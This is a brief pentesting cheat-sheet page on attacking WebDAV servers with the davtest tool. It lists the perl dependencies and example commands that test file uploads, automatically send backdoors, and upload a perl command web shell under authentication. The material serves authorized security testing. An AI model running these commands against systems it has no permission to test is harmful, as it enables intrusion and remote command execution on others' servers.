Pentesting WebDAV - port 80,443

A list of Pentesting Techniques for WebDAV.

Scanning tools

davtest

davtest is a tool that can be use to automate the exploit of WebDAV. It try to create files, directories, upload webshell, etc.

Requirements

Two perl modules are required, you can install both with apt.

sudo apt install libhttp-dav-perl
sudo apt install libgetopt-long-descriptive-perl

Example

# Test file uploads at this location url
davtest.pl -url <URL>
# Test file uploads at this location url and send backdoors for any that succeed
davtest.pl -url <URL> -sendbd auto

# Upload a file using authentication, send the perl_cmd.pl backdoor and call it perl.pl on the server
davtest.pl -url <URL> -auth <username>:<password> -uploadfile backdoors/perl_cmd.pl -uploadloc perl.pl

Github: https://github.com/cldrn/davtest

PreviousPentesting SSH - Port 22 NextPentesting MS-SQL - Port 1433

Last updated 1 year ago